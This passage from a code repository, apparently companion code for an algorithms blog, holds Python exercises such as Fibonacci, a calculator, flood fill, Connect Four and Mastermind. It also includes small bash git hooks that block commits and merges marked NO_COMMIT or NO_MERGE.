for _, c := range "Hello World" {
fmt.Println(space + string(c))
space += " "
}
}
<file_sep>/four_in_a_row/logic.py
# Related blog post - https://algoritmim.co.il/just-code/connect-four-game-in-python/
from four_in_a_row.board import Color
from four_in_a_row.board import BoardUtils
def four_sequence_exists(discs_vector):
longest_seq = 1
current_seq = 1
for i in range(1, len(discs_vector)):
if discs_vector[i] == discs_vector[i - 1] and not (discs_vector[i] is Color.EMPTY.value):
current_seq += 1
if current_seq > longest_seq:
longest_seq = current_seq
else:
current_seq = 1
return longest_seq == 4
def add_disc(current_color, board, column):
row = 0
success = False
while row < board.rows and not success:
if board.get(row, column) is Color.EMPTY:
board.set(row, column, current_color)
success = True
else:
row += 1
return success
def is_win(board, row, column):
vector_getters = [BoardUtils.get_row_vector, BoardUtils.get_column_vector, BoardUtils.get_positive_diagonal_vector,
BoardUtils.get_negative_diagonal_vector
]
for getter in vector_getters:
discs_vector = getter(board, row, column)
if four_sequence_exists(discs_vector):
return True
return False
<file_sep>/recursion/bad_fib.py
from datetime import datetime
def fib(n):
if (n <= 2):
return 1
else:
return fib(n - 1) + fib(n - 2)
def run(n):
start_time = datetime.now()
res = fib(n)
print("Calculating fib(%d) = %d took %s seconds" % (n, res, datetime.now() - start_time))
if __name__ == '__main__':
run(2)
run(5)
run(10)
run(20)
run(30)
run(40)
run(60)
<file_sep>/recur_multiply.py
# Related blog post - https://algoritmim.co.il/2019/06/20/recur-multiply/
class Multiplier(object):
def __init__(self):
self.results_cache = {}
def recur_multiply(self, a, b):
if a == 0:
return 0
if b not in self.results_cache:
if b == 0:
self.results_cache[0] = 0
elif b == 1:
self.results_cache[1] = a
elif b % 2 == 0:
if b / 2 not in self.results_cache:
self.results_cache[b / 2] = self.recur_multiply(a, b / 2)
self.results_cache[b] = self.results_cache[b / 2] + self.results_cache[b / 2]
else:
self.results_cache[(b - 1) / 2] = self.recur_multiply(a, (b - 1) / 2)
self.results_cache[b] = self.results_cache[(b - 1) / 2] + \
self.results_cache[(b - 1) / 2] + \
self.recur_multiply(a, 1)
return self.results_cache[b]
def multiply(self, a, b):
if a > b:
return self.recur_multiply(a, b)
else:
return self.recur_multiply(b, a)
def run_tests():
assert Multiplier().multiply(3, 10) == 30
assert Multiplier().multiply(10, 3) == 30
assert Multiplier().multiply(3, 0) == 0
assert Multiplier().multiply(0, 10) == 0
assert Multiplier().multiply(pow(2, 3), pow(2, 10)) == 8192
if __name__ == '__main__':
run_tests()<file_sep>/find_median_of_three.py
# Related blog post - https://algoritmim.co.il/2019/06/17/find-median-of-three/
def is_median(x, y, z):
    # Returns True if x is the median of the group x, y, z
    return (y <= x <= z) or (z <= x <= y)
def get_median_of_three(a,b,c):
if is_median(a,b,c):
return a
if is_median(b,c,a):
return b
else:
return c
def run_test():
print("The median of [0,0,0] is %d" % get_median_of_three(0,0,0))
print("The median of [10,2,6] is %d" % get_median_of_three(10,2,6))
print("The median of [100,-100,-100] is %d" % get_median_of_three(100,-100,-100))
print("The median of [1,1,9] is %d" % get_median_of_three(1,1,9))
if __name__ == "__main__":
run_test()
<file_sep>/paint_and_fill.py
# Related blog post - https://algoritmim.co.il/2019/06/24/paint-and-fill/
from termcolor import colored
class Position(object):
def __init__(self, x, y):
self.x = x
self.y = y
def get_neighbours(self):
return [
Position(self.x - 1, self.y),
Position(self.x + 1, self.y),
Position(self.x, self.y - 1),
Position(self.x, self.y + 1)
]
class Screen(object):
def __init__(self, base_mat):
self.mat = base_mat
def get_color(self, pos):
return self.mat[pos.x][pos.y]
def set_color(self, pos, new_color):
self.mat[pos.x][pos.y] = new_color
def pos_in_bounds(self, pos):
return 0 <= pos.x < len(self.mat) and 0 <= pos.y < len(self.mat[0])
def get_neighbour(self, pos, old_color):
possible_neighbours = pos.get_neighbours()
for neighbour in possible_neighbours:
if self.pos_in_bounds(neighbour) and self.get_color(neighbour) == old_color:
return neighbour
def print(self):
for i in range(0, len(self.mat)):
row = ""
for j in range(0, len(self.mat[0])):
row += colored("\u2588", self.get_color(Position(i, j)))
print(row)
def paint_and_fill_recur(self, pos, new_color, old_color):
self.set_color(pos, new_color)
next_neighbour = self.get_neighbour(pos, old_color)
while next_neighbour:
self.paint_and_fill_recur(next_neighbour, new_color, old_color)
next_neighbour = self.get_neighbour(pos, old_color)
def paint_and_fill(self, pos, new_color):
if self.get_color(pos) != new_color:
self.paint_and_fill_recur(pos, new_color, self.get_color(pos))
class Colors(object):
W = 'white'
B = 'blue'
G = 'green'
M = 'magenta'
R = 'red'
def run_tests():
A = Screen([[Colors.W, Colors.W, Colors.R]])
print("Before:")
A.print()
A.paint_and_fill(Position(0,0), Colors.B)
print("Paint and fill from (0,0) in blue:")
A.print()
A = Screen([[Colors.R]])
print("Before:")
A.print()
A.paint_and_fill(Position(0,0), Colors.B)
print("Paint and fill from (0,0) in blue:")
A.print()
A = Screen([[Colors.W, Colors.W, Colors.W], [Colors.W, Colors.B, Colors.W], [Colors.W, Colors.W, Colors.W]])
print("Before:")
A.print()
A.paint_and_fill(Position(0,0), Colors.B)
print("Paint and fill from (0,0) in blue:")
A.print()
A.paint_and_fill(Position(1,1), Colors.M)
print("Paint and fill from (1,1) in pink:")
A.print()
A = Screen([[Colors.W, Colors.W, Colors.W], [Colors.W, Colors.B, Colors.W], [Colors.W, Colors.W, Colors.W]])
print("Before:")
A.print()
A.paint_and_fill(Position(2,2), Colors.M)
print("Paint and fill from (2,2) in pink:")
A.print()
A.paint_and_fill(Position(1,1), Colors.W)
print("Paint and fill from (1,1) in white:")
A.print()
A = Screen([[Colors.W, Colors.W, Colors.W], [Colors.W, Colors.W, Colors.W], [Colors.B, Colors.W, Colors.B]])
print("Before:")
A.print()
A.paint_and_fill(Position(0, 0), Colors.G)
print("Paint and fill from (0,0) in Green:")
A.print()
if __name__ == '__main__':
run_tests()<file_sep>/calculator/basic_calc.py
from operator import add, truediv, imul, isub
class OpStr(object):
ADD = "+"
SUB = "-"
MUL = "*"
DIV = "/"
PAR_L = "("
PAR_R = ")"
class BasicCalculator(object):
def __init__(self):
self.operator_to_action = {
OpStr.ADD: add,
OpStr.SUB: isub,
OpStr.MUL: imul,
OpStr.DIV: truediv
}
def __eval_expression(self, arg_1, operator, arg_2):
action = self.operator_to_action[operator]
return action(arg_1, arg_2)
def __evaluate_next_val_and_get_length(self, exp_arr, index):
sub_exp_length = 2
val = exp_arr[index + 1]
if val == OpStr.PAR_L:
sub_exp_length, val = self.__solve_expression_wrap(exp_arr[index + 2:])
return sub_exp_length, val
def __solve_expression(self, exp_arr, current_operators):
new_exp = [exp_arr[0]]
i = 1
while i < len(exp_arr):
operator = exp_arr[i]
if operator == OpStr.PAR_R:
current_exp_length = i + 2
return current_exp_length, new_exp
sub_exp_length, val = self.__evaluate_next_val_and_get_length(exp_arr, i)
if operator in current_operators:
res = self.__eval_expression(new_exp.pop(), operator, val)
new_exp.append(res)
else:
new_exp.append(operator)
new_exp.append(val)
i += sub_exp_length
return len(exp_arr), new_exp
def __solve_expression_wrap(self, exp_arr):
sub_exp_length, exp_arr = self.__solve_expression(exp_arr, [OpStr.MUL, OpStr.DIV])
_, exp_arr = self.__solve_expression(exp_arr, [OpStr.ADD, OpStr.SUB])
return sub_exp_length + 1, exp_arr[0]
def solve(self, exp_arr):
sub_exp_length, res = self.__solve_expression_wrap(exp_arr)
return res
def run_tests():
calc = BasicCalculator()
assert calc.solve([1, "+", 2]) == 3
assert calc.solve([1, "-", 2]) == -1
assert calc.solve([2, "*", "(", 1, "+", 3, ")"]) == 8
assert calc.solve([2, "*", "(", 1, "+", 6, "/", 3, ")"]) == 6
assert calc.solve([2, "*", "(", 1, "+", 6, "/", 3, ")", "-", "(", 5, "*", 2, ")"]) == -4
assert calc.solve([2, "+", "(", 3, "*", "(", 8, "/", 2, ")", "-", 10, ")"]) == 4
if __name__ == '__main__':
run_tests()
<file_sep>/matrix_sums.py
class MatrixPosistion(object):
def __init__(self,i,j):
self.i = i
self.j = j
class MatrixSums(object):
def __init__(self):
self.sums_matrix = None
self.rows = 0
self.columns = 0
def sum(self, pos_a,pos_b):
pos_b_sum = self.get_cell_value(pos_b)
left_mat_sum = self.get_cell_value(MatrixPosistion(pos_b.i, pos_a.j-1))
top_mat_sum = self.get_cell_value(MatrixPosistion(pos_a.i-1,pos_b.j))
corner_mat_sum = self.get_cell_value(MatrixPosistion(pos_a.i-1, pos_a.j-1))
return pos_b_sum - left_mat_sum - top_mat_sum + corner_mat_sum
def get(self, pos_a):
return self.sum(pos_a, pos_a)
def set(self,pos,val):
original_set_value = self.get(pos)
diff = val - original_set_value
for i in range(pos.i,self.rows):
for j in range(pos.j,self.columns):
self.sums_matrix[i][j] += diff
def init_sums_matrix(self, base_matrix):
self.rows = len(base_matrix)
self.columns = len(base_matrix[0])
self.sums_matrix = []
for i in range(0,self.rows):
self.sums_matrix.append(list())
for j in range(0,self.columns):
self.sums_matrix[i].append(0)
for i in range(self.rows-1,-1,-1):
for j in range(self.columns-1,-1,-1):
self.set(MatrixPosistion(i,j),base_matrix[i][j])
def get_cell_value(self,pos):
if pos.i < 0:
return 0
if pos.j < 0:
return 0
return self.sums_matrix[pos.i][pos.j]
def run_tests():
t = MatrixSums()
# [1]
t.init_sums_matrix([[1]])
assert t.get(MatrixPosistion(0, 0)) == 1
assert t.sum(MatrixPosistion(0, 0),MatrixPosistion(0, 0)) == 1
t.set(MatrixPosistion(0, 0),5)
assert t.get(MatrixPosistion(0, 0)) == 5
assert t.sum(MatrixPosistion(0, 0),MatrixPosistion(0, 0)) == 5
# [[1,2,3]
# [2,0,1]]
t.init_sums_matrix([[1, 2, 3], [2, 0, 1]])
assert t.get(MatrixPosistion(0, 0)) == 1
assert t.get(MatrixPosistion(0, 2)) == 3
assert t.sum(MatrixPosistion(0, 0), MatrixPosistion(0, 2)) == 6
assert t.get(MatrixPosistion(1, 2)) == 1
assert t.sum(MatrixPosistion(1, 1), MatrixPosistion(1, 2)) == 1
# [[1,0,3]
# [2,0,1]]
t.set(MatrixPosistion(0, 1), 0)
assert t.get(MatrixPosistion(0, 1)) == 0
assert t.get(MatrixPosistion(0, 2)) == 3
assert t.sum(MatrixPosistion(0, 0), MatrixPosistion(0, 2)) == 4
assert t.sum(MatrixPosistion(0, 0), MatrixPosistion(1, 2)) == 7
assert t.get(MatrixPosistion(1, 2)) == 1
assert t.sum(MatrixPosistion(1, 1), MatrixPosistion(1, 2)) == 1
# [[5,2,3]
# [2,0,1]]
t.set(MatrixPosistion(0, 1), 2)
t.set(MatrixPosistion(0, 0), 5)
assert t.get(MatrixPosistion(0, 0)) == 5
assert t.get(MatrixPosistion(0, 2)) == 3
assert t.sum(MatrixPosistion(0, 0), MatrixPosistion(0, 2)) == 10
assert t.sum(MatrixPosistion(0, 0), MatrixPosistion(1, 2)) == 13
assert t.get(MatrixPosistion(1, 2)) == 1
assert t.sum(MatrixPosistion(1, 1), MatrixPosistion(1, 2)) == 1
if __name__ == '__main__':
run_tests()<file_sep>/file_search.py
# Related blog post - https://algoritmim.co.il/interview-practice/recursive-search-in-a-file-system/
import os
import shutil
def find_files_recur(root, file_name):
def __get_files(folder):
folder_files = os.listdir(folder)
for f in folder_files:
yield os.path.join(folder, f)
def __find_file(f, name):
if not os.path.isdir(f):
if os.path.basename(f) == name:
return f
else:
return __find_file_in_folder(f, name)
def __find_file_in_folder(folder, name):
for f in __get_files(folder):
result = __find_file(f, name)
if result:
return result
return None
return __find_file(root, file_name)
def run_tests(path):
def __before(path):
os.mkdir(path)
file_path = os.path.join(path, "file1.txt")
f = open(file_path, "w+")
f.write("hello!")
subdir = os.path.join(path, "hello")
os.mkdir(subdir)
sub_file_path = os.path.join(subdir, "file2.txt")
f = open(sub_file_path, "w+")
f.write("goodbye")
return file_path, sub_file_path
def __after(path):
shutil.rmtree(path)
file_path, sub_file_path = __before(path)
try:
assert find_files_recur(path, "file1.txt") == file_path
assert find_files_recur(path, "file2.txt") == sub_file_path
assert find_files_recur(path, "hello") is None
except:
print("TESTS FAILED")
finally:
__after(path)
if __name__ == '__main__':
tests_path = "/tmp/file_search_tests"
run_tests(tests_path)
<file_sep>/power_set.py
# Related blog post - https://algoritmim.co.il/2019/06/20/power-set/
def get_padded_bin(num, padded_length):
format_str = '0%db' % padded_length
return format(num, format_str)
def get_all_subsets(group):
group = list(group)
subsets = list()
arr_size = len(group)
max_num = pow(2, arr_size)
for i in range(0, max_num):
current_subset = set()
bin_repr = get_padded_bin(i, arr_size)
for j in range(0, arr_size):
if bin_repr[j] == '1':
current_subset.add(group[j])
subsets.append(current_subset)
return subsets
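The same power set can also be built from the standard library; this is an alternative sketch (the function name is an assumption, not part of the original file):

```python
from itertools import combinations

def power_set_combinations(group):
    # The power set is the union of all k-element combinations, k = 0..len(group).
    items = list(group)
    return [set(c) for k in range(len(items) + 1) for c in combinations(items, k)]
```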
def run_tests():
for group in [set(), {1, 2, 3}, {"dog", "cat", "mouse", "bird"}]:
print("all the subsets of %s are - " % group)
print(get_all_subsets(group))
if __name__ == '__main__':
run_tests()<file_sep>/calculator/magic_calc.py
from basic_calc import BasicCalculator, OpStr
def is_number(val):
return not isinstance(val, str)
class Config(object):
CONF_1 = 1
CONF_2 = 2
class MagicCalculator(BasicCalculator):
def __init__(self):
super(MagicCalculator, self).__init__()
@staticmethod
def __apply_writing_conv(exp_arr, config):
new_exp = []
i = 0
parenthesis_counter = 0
while i < len(exp_arr):
next_val = exp_arr[i]
new_exp.append(next_val)
if is_number(next_val) and i < len(exp_arr) - 1 and exp_arr[i + 1] == OpStr.PAR_L:
if config == Config.CONF_1:
new_exp.append(OpStr.MUL)
elif config == Config.CONF_2:
parenthesis_counter += 1
number = new_exp.pop()
new_exp.extend([OpStr.PAR_L, number, OpStr.MUL])
elif next_val == OpStr.PAR_R:
parenthesis_counter -= 1
if parenthesis_counter == 0:
new_exp.append(OpStr.PAR_R)
i += 1
return new_exp
def solve(self, exp_arr, config=Config.CONF_1):
exp_arr = self.__apply_writing_conv(exp_arr, config)
return super(MagicCalculator, self).solve(exp_arr)
def run_tests():
calc = MagicCalculator()
assert calc.solve([1, "+", 2]) == 3
assert calc.solve([1, "-", 2]) == -1
assert calc.solve([2, "*", "(", 1, "+", 3, ")"]) == 8
assert calc.solve([2, "*", "(", 1, "+", 6, "/", 3, ")"]) == 6
assert calc.solve([2, "*", "(", 1, "+", 6, "/", 3, ")", "-", "(", 5, "*", 2, ")"]) == -4
assert calc.solve([2, "+", "(", 3, "*", "(", 8, "/", 2, ")", "-", 10, ")"]) == 4
assert calc.solve([8, "/", 2, "(", 2, "+", 2, ")"]) == 16
assert calc.solve([8, "/", 2, "(", 2, "+", 2, ")"], Config.CONF_2) == 1
assert calc.solve([1, "+", "(", 2, "/", 2, "(", 1, "+", 1, ")", "+", 3, ")"]) == 6
assert calc.solve([1, "+", "(", 2, "/", 2, "(", 1, "+", 1, ")", "+", 3, ")"], Config.CONF_2) == 4.5
if __name__ == '__main__':
run_tests()
<file_sep>/nextBigger.py
# Related blog post - https://algoritmim.co.il/2020/05/24/next-bigger-number/
def nextBigger(n):
digits = [int(d) for d in str(n)]
for i in range(len(digits) - 2, -1, -1):
for j in range(len(digits) - 1, i, -1):
if digits[i] < digits[j]:
digits[i], digits[j] = digits[j], digits[i]
digits[i+1:] = sorted(digits[i+1:])
return int(''.join([str(d) for d in digits]))
return -1
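A brute-force cross-check can validate the pointer-based solution on small inputs; this helper is a hypothetical addition, not part of the original file:

```python
from itertools import permutations

def next_bigger_brute(n):
    # Smallest rearrangement of n's digits that is strictly greater than n,
    # found by enumerating all digit permutations (exponential - test use only).
    digits = str(n)
    candidates = {int(''.join(p)) for p in permutations(digits)}
    bigger = [c for c in candidates if c > n and len(str(c)) == len(digits)]
    return min(bigger) if bigger else -1
```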
def run_tests():
assert nextBigger(12) == 21
assert nextBigger(513) == 531
assert nextBigger(111) == -1
assert nextBigger(1144) == 1414
assert nextBigger(1662) == 2166
if __name__ == '__main__':
run_tests()
<file_sep>/jump_game.py
# Related blog post - https://algoritmim.co.il/2019/06/23/jump-game/
class JumpGame(object):
def __init__(self):
self.jumps = {}
self.arr = None
def can_finish_from_index(self, i):
if i >= len(self.arr):
self.jumps[i] = False
elif i == len(self.arr) - 1:
self.jumps[i] = True
elif self.arr[i] == 0:
self.jumps[i] = False
else:
self.jumps[i] = False
for jump_size in range(1, self.arr[i]+1):
if i + jump_size not in self.jumps:
self.jumps[i + jump_size] = self.can_finish_from_index(i + jump_size)
self.jumps[i] = self.jumps[i] or self.jumps[i + jump_size]
return self.jumps[i]
def can_finish_game(self, arr):
self.arr = arr
return self.can_finish_from_index(0)
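The memoized recursion above runs in O(n * max_jump); a linear-time greedy alternative (an assumption, not the approach the original takes) only needs the furthest reachable index:

```python
def can_finish_greedy(arr):
    # Track the furthest index reachable so far; if the scan ever passes it,
    # the end of the board cannot be reached.
    if not arr:
        return False
    furthest = 0
    for i, jump in enumerate(arr):
        if i > furthest:
            return False
        furthest = max(furthest, i + jump)
    return True
```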
def run_tests():
assert JumpGame().can_finish_game([]) is False
assert JumpGame().can_finish_game([0]) is True
assert JumpGame().can_finish_game([1, 2, 0, 3]) is True
assert JumpGame().can_finish_game([2, 1, 0, 1]) is False
if __name__ == '__main__':
run_tests()<file_sep>/ProfilingExample/main.py
from time import sleep
from viztracer import VizTracer
def create_list():
return [1] * 10000000
def remove_from_start(li):
li.pop(0)
def remove_from_end(li):
li.pop(len(li) - 1)
def delete_list(my_list):
while len(my_list) > 0:
remove_from_start(my_list)
remove_from_end(my_list)
if __name__ == '__main__':
tracer = VizTracer()
tracer.start()
my_list = create_list()
delete_list(my_list)
tracer.stop()
tracer.save("profile.json")
<file_sep>/bit_manipulation/get_all_powers_of_two.py
def get_all_powers_of_two(x):
res = []
power_of_two = 1
while power_of_two <= x:
if power_of_two & x != 0:
res.append(power_of_two)
power_of_two = power_of_two << 1
return res
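An alternative sketch (not in the original file): `x & -x` isolates the lowest set bit in two's complement, so the powers can be peeled off directly instead of scanning every power of two:

```python
def get_all_powers_of_two_fast(x):
    # Repeatedly strip the lowest set bit until nothing remains.
    res = []
    while x:
        lowest = x & -x
        res.append(lowest)
        x -= lowest
    return res
```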
def run_tests():
assert get_all_powers_of_two(330) == [2, 8, 64, 256]
assert get_all_powers_of_two(3) == [1, 2]
assert get_all_powers_of_two(22) == [2, 4, 16]
assert get_all_powers_of_two(0) == []
assert get_all_powers_of_two(1) == [1]
if __name__ == '__main__':
run_tests()
<file_sep>/Mastermind/app/game_logic/player.py
from app.consts import *
def validate_player_guess(player_guess):
valid_input = True
if len(player_guess) != CODE_LENGTH:
print("Guess should be {} colors long".format(CODE_LENGTH))
valid_input = False
for item in player_guess:
if item not in COLORS:
print("Bad input: {}".format(item))
valid_input = False
return valid_input
def format_player_guess(player_guess):
guess = player_guess.split(" ")
formatted_guess = []
for item in guess:
if item in COLORS_DICT:
formatted_guess.append(COLORS_DICT.get(item))
else:
formatted_guess.append(item)
return formatted_guess
def get_player_guess():
guess = format_player_guess(input(USER_INPUT_PROMPT))
valid_input = validate_player_guess(guess)
while not valid_input:
guess = format_player_guess(input(USER_INPUT_PROMPT))
valid_input = validate_player_guess(guess)
return guess
<file_sep>/hello_world/README.md
A collection of simple hello_world implementations in various languages.
Related blog posts - https://algoritmim.co.il/tag/hello_world/
<file_sep>/descriptive_numbers.py
# Related blog post - https://algoritmim.co.il/2019/06/18/descriptive-numbers/
def get_number_description(num):
res = ""
current_count = 1
current_digit = num[0]
for i in range(1, len(num)):
if num[i] == current_digit:
current_count += 1
else:
res = res + str(current_count) + current_digit
current_digit = num[i]
current_count = 1
res = res + str(current_count) + current_digit
return int(res)
def get_nth_descriptive(n):
if n == 1:
return 1
else:
i = 1
current_number = 1
while i < n:
current_number = get_number_description(str(current_number))
i += 1
return current_number
def run_tests():
assert get_nth_descriptive(1) == 1
assert get_nth_descriptive(2) == 11
assert get_nth_descriptive(5) == 111221
assert get_nth_descriptive(10) == 13211311123113112211
if __name__ == '__main__':
run_tests()<file_sep>/dot_files/git_hooks/pre-commit
#!/bin/bash
# Related blog post (in Hebrew) - https://algoritmim.co.il/2019/12/18/git-me-baby-one-more-time
if git diff --cached | grep '^[+d].*NO_COMMIT'; then
echo "Can't commit file with NO_COMMIT comment, remove the debug code and try again"
exit 1
fi<file_sep>/fibsum.py
def fibsum(N):
if N == 0:
return 0
previous = 0
current = 1
while current <= N:
tmp = current
current = current + previous
previous = tmp
########## here current > N and previous <= N
count = 0
remain = N
while remain >= previous:
count += 1
remain -= previous
return count + fibsum(remain)
if __name__ == '__main__':
assert fibsum(0) == 0
assert fibsum(2) == 1
assert fibsum(8) == 1
assert fibsum(11) == 2
assert fibsum(12) == 3
<file_sep>/palindrome.py
# Related blog post - https://algoritmim.co.il/2020/02/03
def is_palindrome_v1(word):
word = str(word)
i = 0
j = len(word) - 1
while i < j:
if word[i] != word[j]:
return False
i += 1
j -= 1
return True
def _is_palindrome_recur(word):
if len(word) <= 1:
return True
if word[0] != word[-1]:
return False
return _is_palindrome_recur(word[1:-1])
def is_palindrome_v2(word):
return _is_palindrome_recur(str(word))
def run_tests():
for func in [is_palindrome_v1, is_palindrome_v2]:
assert func("a") is True
assert func("aba") is True
assert func("abba") is True
assert func("dog") is False
assert func(123) is False
assert func(123321) is True
if __name__ == '__main__':
run_tests()
<file_sep>/anagrams.py
# Related blog post - https://algoritmim.co.il/2019/07/17/anagrams/
import string
from collections import defaultdict
def get_word_key(word):
hist = defaultdict(int)
for c in word:
hist[c] += 1
str_hist = ""
for c in string.ascii_letters:
str_hist += "%s%d" % (c, hist[c])
return str_hist
def find_anagrams(arr):
results = defaultdict(list)
for i in range(0, len(arr)):
word = arr[i]
word_key = get_word_key(word)
results[word_key].append(i + 1)
return list(results.values())
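A shorter key is possible (this variant is an alternative, not the original's approach): sorting a word's letters yields one canonical key per anagram class, making the explicit histogram string unnecessary:

```python
from collections import defaultdict

def find_anagrams_sorted_key(arr):
    # Words that are anagrams of each other sort to the same letter tuple.
    groups = defaultdict(list)
    for i, word in enumerate(arr):
        groups[tuple(sorted(word))].append(i + 1)
    return list(groups.values())
```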
def run_tests():
assert find_anagrams(["dog", "god", "odg"]) == [[1,2,3]]
assert find_anagrams(["dog", "cat", "god", "odg"]) == [[1,3,4], [2]]
assert find_anagrams(["dog"]) == [[1]]
assert find_anagrams(["dog", "dog"]) == [[1, 2]]
assert find_anagrams(["dog", "Dog"]) == [[1], [2]]
assert find_anagrams(["dog", "cat", "toy", "boy"]) == [[1], [2], [3], [4]]
if __name__ == '__main__':
run_tests()<file_sep>/four_in_a_row/board.py
# Related blog post - https://algoritmim.co.il/just-code/connect-four-game-in-python/
from enum import Enum
ROWS = 6
COLUMNS = 9
class Color(Enum):
EMPTY = 0
RED = 1
BLUE = 2
def __str__(self):
return '%s' % self.value
class BoardUtils:
@staticmethod
def get_row_vector(board, row, column):
start = max(0, column - 3)
end = min(board.columns-1, column + 3)
vector = []
for c in range(start, end + 1):
vector.append(board.get(row, c))
return vector
@staticmethod
def get_column_vector(board, row, column):
start = max(0, row - 3)
end = min(board.rows-1, row + 3)
vector = []
for r in range(start, end + 1):
vector.append(board.get(r, column))
return vector
@staticmethod
def get_positive_diagonal_vector(board, row, column):
start_row = row - 3
start_column = column - 3
end_row = row + 3
end_column = column + 3
vector = []
r = start_row
c = start_column
while r <= end_row and c <= end_column:
vector.append(board.get(r, c))
r += 1
c += 1
return vector
@staticmethod
def get_negative_diagonal_vector(board, row, column):
start_row = row + 3
start_column = column - 3
end_row = row - 3
end_column = column + 3
vector = []
r = start_row
c = start_column
while r >= end_row and c <= end_column:
vector.append(board.get(r, c))
r -= 1
c += 1
return vector
class Board:
def __init__(self, rows=ROWS, columns=COLUMNS, state=None):
self.rows = rows
self.columns = columns
if state is None:
self.init_empty_board()
else:
self.state = state
def __repr__(self):
result = ""
for r in range(self.rows - 1, -1, -1):
row = " ".join([str(self.state[r][c]) for c in range(0, self.columns)])
result += row + '\n'
return '\n' + result + '\n'
def init_empty_board(self):
self.state = [[Color.EMPTY for _ in range(0, self.columns)] for _ in range(0, self.rows)]
@classmethod
def read(cls, input_board):
rows = len(input_board)
columns = len(input_board[0])
board_state = []
for r in range(rows - 1, -1, -1):
board_state.append(input_board[r])
return Board(rows, columns, board_state)
def get(self, r, c):
return self.state[r][c] if 0 <= r < self.rows and 0 <= c < self.columns else Color.EMPTY
def set(self, r, c, val):
self.state[r][c] = val
<file_sep>/island_journey.py
class Island(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return self.name
class Bridge(object):
def __init__(self, I1, I2, danger_grade):
self.I1 = I1
self.I2 = I2
self.danger_grade = danger_grade
def __repr__(self):
return str(self.danger_grade)
def find_island_set(map_v, island):
for island_set in map_v:
if island in island_set:
return island_set
return None
def add_bridge_islands(map_v, bridge):
set_i1 = find_island_set(map_v, bridge.I1)
set_i2 = find_island_set(map_v, bridge.I2)
if set_i1 is not None and set_i1 is set_i2:
# both islands are already connected - the bridge adds nothing
return 0
if set_i1 is not None and set_i2 is not None:
# the bridge merges two existing components
set_i1.update(set_i2)
map_v.remove(set_i2)
return 1
if set_i1 is not None:
set_i1.add(bridge.I2)
return 1
if set_i2 is not None:
set_i2.add(bridge.I1)
return 1
map_v.append({bridge.I1, bridge.I2})
return 2
def create_map(V, E):
if len(V) <= 1:
return []
ordered_bridges = sorted(E, key=lambda x: x.danger_grade)
map_e = list()
map_v = list()
for bridge in ordered_bridges:
if add_bridge_islands(map_v, bridge):
map_e.append(bridge)
if len(map_v) == 1 and len(map_v[0]) == len(V):
break
return map_e
def run_tests():
A = Island("A")
B = Island("B")
C = Island("C")
D = Island("D")
V = [A, B, C, D]
#
# e_1 = Bridge(A,B,1)
# e_2 = Bridge(A,D,6)
# e_3 = Bridge(A,C,2)
# e_4 = Bridge(B,C,3)
# e_5 = Bridge(D,C,8)
# E = [e_1, e_2, e_3, e_4, e_5]
# assert create_map(V,E) == [e_1,e_3,e_2]
e_1 = Bridge(A,B,1)
e_2 = Bridge(A,D,3)
e_3 = Bridge(A,C,10)
e_4 = Bridge(B,C,4)
e_5 = Bridge(D,C,2)
E = [e_1, e_2, e_3, e_4, e_5]
assert create_map(V,E) == [e_1,e_5,e_2]
if __name__ == '__main__':
run_tests()<file_sep>/bit_manipulation/check_bit_set.py
def bit_set(x, y):
mask = 1 << (y - 1)
return (x & mask) != 0
def run_tests():
assert bit_set(5, 1) is True
assert bit_set(5, 2) is False
assert bit_set(5, 3) is True
assert bit_set(15, 3) is True
assert bit_set(0, 3) is False
assert bit_set(0, 30) is False
if __name__ == '__main__':
run_tests()
<file_sep>/recursion/memoizedFib.py
from datetime import datetime
def memoized_fib(n):
results_cache = {}
def fib(num):
if num in results_cache:
return results_cache[num]
else:
if num <= 2:
res = 1
else:
res = fib(num - 1) + fib(num - 2)
results_cache[num] = res
return res
return fib(n)
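The same memoization idea is available from the standard library; this sketch (not part of the original file) replaces the hand-rolled cache with `functools.lru_cache`:

```python
from functools import lru_cache

@lru_cache(maxsize=None)
def fib_cached(num):
    # Results are cached per argument, so each fib value is computed once.
    return 1 if num <= 2 else fib_cached(num - 1) + fib_cached(num - 2)
```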
def run(n):
start_time = datetime.now()
res = memoized_fib(n)
print("Calculating fib(%d) = %d took %s seconds" % (n, res, datetime.now() - start_time))
if __name__ == '__main__':
import sys
# fib(n) recurses roughly n frames deep - raise the limit so run(1000)
# doesn't hit Python's default RecursionError
sys.setrecursionlimit(5000)
run(2)
run(5)
run(10)
run(50)
run(100)
run(500)
run(1000)
<file_sep>/dot_files/git_hooks/pre-merge-commit
#!/bin/bash
# Related blog post (in Hebrew) - https://algoritmim.co.il/2019/12/18/git-me-baby-one-more-time
# Get the current branch name
branch_name=$(git branch | grep "*" | sed "s/\* //")
# if the merged branch was master - don't do anything
if [[ $branch_name = "master" ]]; then
echo "Preparing to merge to master..."
if git diff --cached | grep '^[+d].*NO_MERGE'; then
echo "Can't merge branch with 'NO_MERGE' comment, fix what you need and try again!"
exit 1
fi
fi<file_sep>/Mastermind/tests/game_locig/test_check_player_guess_with_duplicates.py
from app.game_logic.checkers import check_player_guess_with_duplicates
def test_check_duplicates_in_guess_not_scored_twice():
code = ["red", "blue", "green"]
guess1 = ["red", "red", "red"]
assert check_player_guess_with_duplicates(code, guess1) == (1, 0)
guess2 = ["blue", "blue", "blue"]
assert check_player_guess_with_duplicates(code, guess2) == (1, 0)
guess3 = ["blue", "blue", "red"]
assert check_player_guess_with_duplicates(code, guess3) == (1, 1)
<file_sep>/Mastermind/app/consts.py
COLORS = ["red", "blue", "green", "purple", "orange", "yellow"]
COLORS_DICT = {color[0]: color for color in COLORS}
CODE_LENGTH = 2
TOTAL_ROUNDS = 12
USER_INPUT_PROMPT = "Please enter your next guess. (r=red b=blue g=green p=purple o=orange y=yellow)\n"
USER_SCORE = "Bul: {}, Pgia: {}\n"
USER_WON = "You Win!"
USER_LOST = "You Lose!"
<file_sep>/dot_files/git_wrapper
#!/bin/bash
function git {
if [[ "$1" = "merge" && "$@" != *"--help"* && "$@" != *"--abort"* ]]; then
git_merge_wrapper "$@";
else
command git "$@"
fi
}
function git_merge_wrapper {
command git "$@"
ret_code=$?
if [[ "$ret_code" != 0 ]]; then
command git merge --abort
fi
}<file_sep>/ice_cream.py
# Related blog post - https://algoritmim.co.il/2019/07/18/ice-cream/
class IceCreamChooser(object):
def __init__(self, ice_cream_costs):
self.ice_cream_costs = ice_cream_costs
def choose_ice_cream_once(self, money):
raise NotImplementedError
def choose_ice_cream(self, money_sums):
results = []
for money in money_sums:
results.append(self.choose_ice_cream_once(money))
return results
class IceCreamChooseLimitedVisits(IceCreamChooser):
